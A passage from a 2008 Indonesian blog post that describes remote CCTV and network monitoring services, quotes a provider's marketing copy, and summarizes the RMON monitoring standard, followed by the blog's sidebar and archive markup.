telemetry, control can be maintained over cameras, lights, gates indeed any building management function. <br /><br />CCTV monitoring falls into two categories, reactive or proactive and both require a different level of service.<br /><br />Reactive CCTV monitoring involves alarm detection on site which initiates a picture transmission to the monitoring centre. Depending on the requirements and the situation the alarm is dispatched to a response agency.<br /><br />Proactive monitoring is real time, for example city centre or high street locations. In this instance the operator is constantly reviewing the location and informing security or the emergency services to dangerous situations.<br /><span class="fullpost"><br />In both types of monitoring there is recorded evidence of what was seen and often this is used to assist the police in their enquiries. Historical evidence is used to supplement non related incidents, enabling the police to build a case.<br /><br />CCTV in the public sector is governed by the data protection act and the human rights act, it is there to protect the benefit of the public not to spy on them.<br /><br />CCTV is also used to supplement intruder alarm systems to provide confirmation that there is someone on site and that the alarm received is not false. <br /><br />All Coverer’s Remote Monitoring service give you peace of mind that your critical network devices such as your servers, routers, firewall and network services such as email, web and backup are running smoothly.<br /><br />Remote network monitoring allows All Covered to anticipate or identify issues before they become major problems. Real-time reports and a status dashboard help pinpoint the problem areas immediately.<br /><br />Network Operations Center (NOC) monitors your network devices 24 x 7 and if there is an alert, they will quickly determine if the issue is merely a warning or false positive, or if it warrants remote support from Client Support Center (CSC) or an onsite visit by your consultant. Business impact rules are determined with you in advance for each device or service being monitored, so All Covered knows how you would like us to resolve an issue – 24 x 7, the next business day, our next on-site visit or any other interval.<br /><br />If Remote Support is required, the CSC engineer is equipped to handle the issue using state-of-the-art tools and our network guidebook documentation. Remote Computer Support System allows the CSC engineer or consultants securely log into the server, pinpoints the problem and resolve it remotely. The service is convenient and provides a fast response because support can be done 24 x 7 without intervention on your part or disruption to you.<br /><br />Remote Monitoring (RMON) is a standard monitoring specification that enables various network monitors and console systems to exchange network-monitoring data. RMON provides network administrators with more freedom in selecting network-monitoring probes and consoles with features that meet their particular networking needs.<br /><br />The RMON specification defines a set of statistics and functions that can be exchanged between RMON-compliant console managers and network probes. As such, RMON provides network administrators with comprehensive network-fault diagnosis, planning, and performance-tuning information. <br /><br />RMON was defined by the user community with the help of the Internet Engineering Task Force (IETF). It became a proposed standard in 1992 as RFC 1271 (for Ethernet). RMON then became a draft standard in 1995 as RFC 1757, effectively obsoleting RFC 1271.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/remote-cctv-monitoring-service-give.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/remote-cctv-monitoring-service-give.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T10:52:00+07:00'>10:52 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=7793314325461483616' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=7793314325461483616' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=7793314325461483616&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> </div></div> <!-- google_ad_section_end --> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='http://bens-qiu.blogspot.com/search?updated-max=2008-09-10T07:18:00%2B07:00&max-results=5&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Newer Posts'>Newer Posts</a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://bens-qiu.blogspot.com/search?updated-max=2008-04-12T10:52:00%2B07:00&max-results=5' id='Blog1_blog-pager-older-link' title='Older Posts'>Older Posts</a> </span> <a class='home-link' href='http://bens-qiu.blogspot.com/'>Home</a> </div> <div class='clear'></div> <div class='blog-feeds'> <div class='feed-links'> Subscribe to: <a class='feed-link' href='http://bens-qiu.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Posts (Atom)</a> </div> </div> <script type="text/javascript">window.___gcfg = {'lang': 'en'};</script> </div><div class='widget Gadget' id='Gadget3'> <h2 class='title'>Google Hot Trends</h2> <div class='widget-content'> <script type="text/javascript"> if (!window.gadgets || !gadgets.rpc) { document.write('<script type="text/javascript"' + 'src="//www-blogger-opensocial.googleusercontent.com/gadgets/js/rpc.js?container\x3dblogger\x26nocache\x3d0\x26debug\x3d0\x26c\x3d1\x26v\x3dd30b8b5668c233bafcf12346b6771e3e\x26sv\x3d10">' + '</scr' + 'ipt>'); } </script> <script type="text/javascript"> function registerGetBlogUrls() { gadgets.rpc.register('getBlogUrls', function() { var holder = {}; holder.postFeed = "http://www.blogger.com/feeds/7762973590000180538/posts/default"; holder.commentFeed = "http://www.blogger.com/feeds/7762973590000180538/comments/default"; holder.currentBlogUrl = "http://bens-qiu.blogspot.com/"; holder.currentBlogId = "7762973590000180538"; return holder; }); } </script> <script type="text/javascript"> if (!window.registeredCommonBloggerCallbacks) { window.registeredCommonBloggerCallbacks = true; gadgets.rpc.register('resize_iframe', function(height) { var el = document.getElementById(this['f']); if (el) { el.style.height = height + 'px'; } }); gadgets.rpc.register('set_pref', function() {}); registerGetBlogUrls(); } </script> <iframe src="//www-blogger-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.marcelmaatkamp.com/googletrends.xml&container=blogger&view=default&lang=en&country=ALL&sanitize=0&v=e5800c24a6e16fef&libs=analytics:core:dynamic-height&parent=http://bens-qiu.blogspot.com/&mid=3#st=e%3DAFlCd0WPxykfvMU66ZSBQ49wYcEX7bn%252BtIasUmAs2ciambDcIH45qxzHg5zOXxPvQ0sCuXPDaAK4vGVhdk%252B75jBzn5laUnRDvCZWcrUQ8XVyobrG9Dlu9Ik%252FthSWNNbB9ObYdP4m1eT2%26c%3Dblogger&rpctoken=-155403497995177916" frameborder="0" style="width: 100%; display: block" height="200" id="sidebar-gadget3" name="sidebar-gadget3"></iframe> <script type="text/javascript"> gadgets.rpc.setRelayUrl("sidebar-gadget3", '//www-blogger-opensocial.googleusercontent.com/gadgets/files/container/rpc_relay.html'); gadgets.rpc.setAuthToken("sidebar-gadget3", "-155403497995177916"); </script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Gadget&widgetId=Gadget3&action=editWidget§ionId=main' onclick='return _WidgetManager._PopupConfig(document.getElementById("Gadget3"));' target='configGadget3' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget Gadget' id='Gadget7'> <h2 class='title'>Watch TV shows online</h2> <div class='widget-content'> <script type="text/javascript"> if (!window.gadgets || !gadgets.rpc) { document.write('<script type="text/javascript"' + 'src="//www-blogger-opensocial.googleusercontent.com/gadgets/js/rpc.js?container\x3dblogger\x26nocache\x3d0\x26debug\x3d0\x26c\x3d1\x26v\x3dd30b8b5668c233bafcf12346b6771e3e\x26sv\x3d10">' + '</scr' + 'ipt>'); } </script> <script type="text/javascript"> function registerGetBlogUrls() { gadgets.rpc.register('getBlogUrls', function() { var holder = {}; holder.postFeed = "http://www.blogger.com/feeds/7762973590000180538/posts/default"; holder.commentFeed = "http://www.blogger.com/feeds/7762973590000180538/comments/default"; holder.currentBlogUrl = "http://bens-qiu.blogspot.com/"; holder.currentBlogId = "7762973590000180538"; return holder; }); } </script> <script type="text/javascript"> if (!window.registeredCommonBloggerCallbacks) { window.registeredCommonBloggerCallbacks = true; gadgets.rpc.register('resize_iframe', function(height) { var el = document.getElementById(this['f']); if (el) { el.style.height = height + 'px'; } }); gadgets.rpc.register('set_pref', function() {}); registerGetBlogUrls(); } </script> <iframe src="//www-blogger-opensocial.googleusercontent.com/gadgets/ifr?url=http://hosting.gmodules.com/ig/gadgets/file/101463307027941272586/wso_gadget.xml&container=blogger&view=default&lang=en&country=ALL&sanitize=0&v=bf276ad98fc290e9&up_view=Thumbs&libs=core:dynamic-height:tabs&parent=http://bens-qiu.blogspot.com/&mid=7#st=e%3DAFlCd0V%252BGmcyceEadPtNttQV7iVWnLv75a78IZoTCv2l5DOw5jGByaxN7l87ebrVPF294HA3bPwHMGmaZwdm5YMgl6HdEgvWGik9MmChW2WTEU3CaOkxi0RIHZCWwr1c1eU1r6hKNOti%26c%3Dblogger&rpctoken=-6520013683491192668" frameborder="0" style="width: 100%; display: block" height="215" id="sidebar-gadget7" name="sidebar-gadget7"></iframe> <script type="text/javascript"> gadgets.rpc.setRelayUrl("sidebar-gadget7", '//www-blogger-opensocial.googleusercontent.com/gadgets/files/container/rpc_relay.html'); gadgets.rpc.setAuthToken("sidebar-gadget7", "-6520013683491192668"); </script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Gadget&widgetId=Gadget7&action=editWidget§ionId=main' onclick='return _WidgetManager._PopupConfig(document.getElementById("Gadget7"));' target='configGadget7' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget Gadget' id='Gadget1'> <h2 class='title'>Search YouTube</h2> <div class='widget-content'> <script type="text/javascript"> if (!window.gadgets || !gadgets.rpc) { document.write('<script type="text/javascript"' + 'src="//www-blogger-opensocial.googleusercontent.com/gadgets/js/rpc.js?container\x3dblogger\x26nocache\x3d0\x26debug\x3d0\x26c\x3d1\x26v\x3d4a3f6ab85749752a9689f96489ce82b3\x26sv\x3d10">' + '</scr' + 'ipt>'); } </script> <script type="text/javascript"> function registerGetBlogUrls() { gadgets.rpc.register('getBlogUrls', function() { var holder = {}; holder.postFeed = "http://www.blogger.com/feeds/7762973590000180538/posts/default"; holder.commentFeed = "http://www.blogger.com/feeds/7762973590000180538/comments/default"; holder.currentBlogUrl = "http://bens-qiu.blogspot.com/"; holder.currentBlogId = "7762973590000180538"; return holder; }); } </script> <script type="text/javascript"> if (!window.registeredCommonBloggerCallbacks) { window.registeredCommonBloggerCallbacks = true; gadgets.rpc.register('resize_iframe', function(height) { var el = document.getElementById(this['f']); if (el) { el.style.height = height + 'px'; } }); gadgets.rpc.register('set_pref', function() {}); registerGetBlogUrls(); } </script> <iframe src="//www-blogger-opensocial.googleusercontent.com/gadgets/ifr?url=http://throttled.org/googlegadgets/youtubesearch.xml&container=blogger&view=default&lang=en&country=ALL&sanitize=0&v=14468a03818c6cdb&libs=core&parent=http://bens-qiu.blogspot.com/&mid=1#st=e%3DAFlCd0X0zw7NzKK4ckKtVkthZNMQPaGq1pYbuotwSvadJMgHw0z%252FEgaghwjGOwLANK18l9oEO7xLvxc68xGju46CJKcYtLVFGSKJx4LPMRSCO2%252FPilph2UEcebLoWekPXbhq9iHi5cVH%26c%3Dblogger&rpctoken=-7549323290079634193" frameborder="0" style="width: 100%; display: block" height="250" id="sidebar-gadget1" name="sidebar-gadget1"></iframe> <script type="text/javascript"> gadgets.rpc.setRelayUrl("sidebar-gadget1", '//www-blogger-opensocial.googleusercontent.com/gadgets/files/container/rpc_relay.html'); gadgets.rpc.setAuthToken("sidebar-gadget1", "-7549323290079634193"); </script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Gadget&widgetId=Gadget1&action=editWidget§ionId=main' onclick='return _WidgetManager._PopupConfig(document.getElementById("Gadget1"));' target='configGadget1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div></div> </div> </div> <div class='column-left-outer'> <div class='column-left-inner'> <aside> </aside> </div> </div> <div class='column-right-outer'> <div class='column-right-inner'> <aside> <div class='sidebar section' id='sidebar-right-1'><div class='widget HTML' id='HTML8'> <h2 class='title'>Diskon Hingga 90%</h2> <div class='widget-content'> <a href="https://www.dealkeren.com/jakarta/invitation/?s=c3ec1e10e0537129d2afcc2fe08c3da5" title="Deal Keren"><img src="http://www.jobstreet.co.id/logos/agenalogos/deal_keren_graha_solusi_lestari.jpg" border="0" alt="MainMusik.com" width="200" height="75"/></a> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML8&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML8"));' target='configHTML8' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML5'> <h2 class='title'>Love Moon Anion - Pembalut dan Pentilner Kesehatan</h2> <div class='widget-content'> <a href="http://www.kaskus.us/showthread.php?t=11370083">Love Moon Anion</a> <p> <a href="http://bens-qiu.blogspot.com/2011/11/love-moon-anion-pembalut-dan-pentilner.html">Love Moon Anion</a></p> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML5&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML5"));' target='configHTML5' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget AdSense' id='AdSense1'> <div class='widget-content'> <script type="text/javascript"><!-- google_ad_client="pub-2131843177478422"; google_ad_host="pub-1556223355139109"; google_alternate_ad_url="http://www.blogger.com/img/blogger_ad160x600.html"; google_ad_width=160; google_ad_height=600; google_ad_format="160x600_as"; google_ad_type="text_image"; google_ad_host_channel="00000"; google_color_border="000000"; google_color_bg="000000"; google_color_link="777777"; google_color_url="99AADD"; google_color_text="999999"; //--></script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=AdSense&widgetId=AdSense1&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("AdSense1"));' target='configAdSense1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div> </div><div class='widget Gadget' id='Gadget5'> <h2 class='title'>IP Address Lookup</h2> <div class='widget-content'> <script type="text/javascript"> if (!window.gadgets || !gadgets.rpc) { document.write('<script type="text/javascript"' + 'src="//www-blogger-opensocial.googleusercontent.com/gadgets/js/rpc.js?container\x3dblogger\x26nocache\x3d0\x26debug\x3d0\x26c\x3d1\x26v\x3dd30b8b5668c233bafcf12346b6771e3e\x26sv\x3d10">' + '</scr' + 'ipt>'); } </script> <script type="text/javascript"> function registerGetBlogUrls() { gadgets.rpc.register('getBlogUrls', function() { var holder = {}; holder.postFeed = "http://www.blogger.com/feeds/7762973590000180538/posts/default"; holder.commentFeed = "http://www.blogger.com/feeds/7762973590000180538/comments/default"; holder.currentBlogUrl = "http://bens-qiu.blogspot.com/"; holder.currentBlogId = "7762973590000180538"; return holder; }); } </script> <script type="text/javascript"> if (!window.registeredCommonBloggerCallbacks) { window.registeredCommonBloggerCallbacks = true; gadgets.rpc.register('resize_iframe', function(height) { var el = document.getElementById(this['f']); if (el) { el.style.height = height + 'px'; } }); gadgets.rpc.register('set_pref', function() {}); registerGetBlogUrls(); } </script> <iframe src="http://www.ip-lookup.net/widget.php?libs=core&container=blogger&view=default&lang=en&country=ALL&sanitize=0&v=6d8ed5ae2afd207e&st=e%3DAFlCd0VB%252FnPXbQ%252FoVW2EIoQH5vIlEbUykEvwIUuLt6dP6z32kDjvUQg4bd8cRQsIaXcRLbIaBK0fmxFOTOkNv8HQzu9fWnj5uXJ2GZkszP7k1KgJtkNdag0Nfc%252Bjt%252BXfBdFOGHRek5TI%26c%3Dblogger&libs=js/core.js&parent=http://bens-qiu.blogspot.com/&rpctoken=4081132980935997896&mid=5" frameborder="0" style="width: 100%; display: block" height="130" id="sidebar-gadget5" name="sidebar-gadget5"></iframe> <script type="text/javascript"> gadgets.rpc.setRelayUrl("sidebar-gadget5", 'http://www.ip-lookup.net/gadgets/files/container/rpc_relay.html'); gadgets.rpc.setAuthToken("sidebar-gadget5", "4081132980935997896"); </script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Gadget&widgetId=Gadget5&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("Gadget5"));' target='configGadget5' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML7'> <h2 class='title'>Blogger Maniak</h2> <div class='widget-content'> Ingin cepat menghasilkan banyak uang dengan blog Anda??Tinggal klik saja <a href="http://Kumpulblogger.com/signup.php?refid=126517">disini</a> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML7&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML7"));' target='configHTML7' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget Followers' id='Followers1'> <h2 class='title'>Follower</h2> <div class='widget-content'> <div id='Followers1-wrapper'> <div style='margin-right:2px;'> <script type="text/javascript"> if (!window.google || !google.friendconnect) { document.write('<script type="text/javascript"' + 'src="//www.google.com/friendconnect/script/friendconnect.js">' + '</scr' + 'ipt>'); } </script> <script type="text/javascript"> if (!window.registeredBloggerCallbacks) { window.registeredBloggerCallbacks = true; gadgets.rpc.register('requestReload', function() { document.location.reload(); }); gadgets.rpc.register('requestSignOut', function(siteId) { google.friendconnect.container.openSocialSiteId = siteId; google.friendconnect.requestSignOut(); }); } </script> <script type="text/javascript"> function registerGetBlogUrls() { gadgets.rpc.register('getBlogUrls', function() { var holder = {}; holder.postFeed = "http://www.blogger.com/feeds/7762973590000180538/posts/default"; holder.commentFeed = "http://www.blogger.com/feeds/7762973590000180538/comments/default"; holder.currentBlogUrl = "http://bens-qiu.blogspot.com/"; holder.currentBlogId = "7762973590000180538"; return holder; }); } </script> <script type="text/javascript"> if (!window.registeredCommonBloggerCallbacks) { window.registeredCommonBloggerCallbacks = true; gadgets.rpc.register('resize_iframe', function(height) { var el = document.getElementById(this['f']); if (el) { el.style.height = height + 'px'; } }); gadgets.rpc.register('set_pref', function() {}); registerGetBlogUrls(); } </script> <div id="div-t6ksplvu5gah" style="width: 100%; "></div> <script type="text/javascript"> var skin = {}; skin['FACE_SIZE'] = '32'; skin['HEIGHT'] = "260"; skin['TITLE'] = "Follower"; skin['BORDER_COLOR'] = "transparent"; skin['ENDCAP_BG_COLOR'] = "transparent"; skin['ENDCAP_TEXT_COLOR'] = "#999999"; skin['ENDCAP_LINK_COLOR'] = "#99aadd"; skin['ALTERNATE_BG_COLOR'] = "transparent"; skin['CONTENT_BG_COLOR'] = "transparent"; skin['CONTENT_LINK_COLOR'] = "#99aadd"; skin['CONTENT_TEXT_COLOR'] = "#999999"; skin['CONTENT_SECONDARY_LINK_COLOR'] = "#99aadd"; skin['CONTENT_SECONDARY_TEXT_COLOR'] = "#777777"; skin['CONTENT_HEADLINE_COLOR'] = "#aadd99"; skin['FONT_FACE'] = "normal normal 13px Arial, Tahoma, Helvetica, FreeSans, sans-serif"; google.friendconnect.container.setParentUrl("/"); google.friendconnect.container["renderMembersGadget"]( {id: "div-t6ksplvu5gah", height: 260, site: "09651878975753851619", locale: 'en' }, skin); </script> </div> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Followers&widgetId=Followers1&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("Followers1"));' target='configFollowers1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div> </div><div class='widget HTML' id='HTML1'> <div class='widget-content'> <script src="http://www.clocklink.com/embed.js"></script><script language="JavaScript" type="text/javascript">obj=new Object;obj.clockfile="0012-ltblue.swf";obj.TimeZone="JOG";obj.width=150;obj.height=150;obj.wmode="transparent";showClock(obj);</script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML1&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML1"));' target='configHTML1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML4'> <h2 class='title'>Jumlah Pengunjung</h2> <div class='widget-content'> <div align="center"><a href="http://www.hit-counts.com"><img border="0" alt="hit counters" src="http://www.hit-counts.com/counter.php?t=38&digits=6&ic=0&cid=528109"/></a><br/><a href="http://www.hit-counts.com">hit counter</a></div> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML4&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML4"));' target='configHTML4' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget BlogArchive' id='BlogArchive1'> <h2>Blog Archive</h2> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/search?updated-min=2012-01-01T00:00:00%2B07:00&updated-max=2013-01-01T00:00:00%2B07:00&max-results=1'>2012</a> <span class='post-count' dir='ltr'>(1)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2012_02_01_archive.html'>February</a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/search?updated-min=2011-01-01T00:00:00%2B07:00&updated-max=2012-01-01T00:00:00%2B07:00&max-results=3'>2011</a> <span class='post-count' dir='ltr'>(3)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2011_09_01_archive.html'>September</a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2011_07_01_archive.html'>July</a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/search?updated-min=2010-01-01T00:00:00%2B07:00&updated-max=2011-01-01T00:00:00%2B07:00&max-results=32'>2010</a> <span class='post-count' dir='ltr'>(32)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2010_07_01_archive.html'>July</a> <span class='post-count' dir='ltr'>(15)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2010_06_01_archive.html'>June</a> <span class='post-count' dir='ltr'>(6)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2010_04_01_archive.html'>April</a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2010_02_01_archive.html'>February</a> <span class='post-count' dir='ltr'>(10)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/search?updated-min=2009-01-01T00:00:00%2B07:00&updated-max=2010-01-01T00:00:00%2B07:00&max-results=36'>2009</a> <span class='post-count' dir='ltr'>(36)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2009_10_01_archive.html'>October</a> <span class='post-count' dir='ltr'>(25)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2009_04_01_archive.html'>April</a> <span class='post-count' dir='ltr'>(11)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'>▼ </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/search?updated-min=2008-01-01T00:00:00%2B07:00&updated-max=2009-01-01T00:00:00%2B07:00&max-results=50'>2008</a> <span class='post-count' dir='ltr'>(65)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2008_09_01_archive.html'>September</a> <span class='post-count' dir='ltr'>(25)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2008_06_01_archive.html'>June</a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2008_05_01_archive.html'>May</a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'>▼ </span> </a> <a class='post-count-link' href='http://bens-qiu.blogspot.com/2008_04_01_archive.html'>April</a> <span class='post-count' dir='ltr'>(38)</span> <ul class='posts'> <li><a href='http://bens-qiu.blogspot.com/2008/04/siingkiirkan-password-screen-saver.html'>Siingkiirkan Password Screen Saver</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/password-default-untuk-windows-xp.html'>Password Default untuk windows XP</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/tekhnik-exploit-password-winxp.html'>Tekhnik Exploit Password WinXP</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/studi-kasus-kelemahan-server-situs.html'>Studi Kasus kelemahan Server Situs www.rasasayang....</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/security-vulnerability-pada-indobilling.html'>Security Vulnerability Pada IndoBilling</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/penjebolan-server-melalui-ftp.html'>Penjebolan Server Melalui FTP</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/pemrograman-asp-untuk-mengenkripsi.html'>Pemrograman ASP untuk Mengenkripsi Password</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/menjebol-password-folder-guard-pro-52.html'>Menjebol Password FOLDER GUARD Pro 5.2</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/mendapatkan-account-isp-gratis.html'>Mendapatkan account ISP gratis!</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/mencurangi-hampir-semua-jenis-billing.html'>Mencurangi (hampir) Semua Jenis Billing Warnet</a></li> 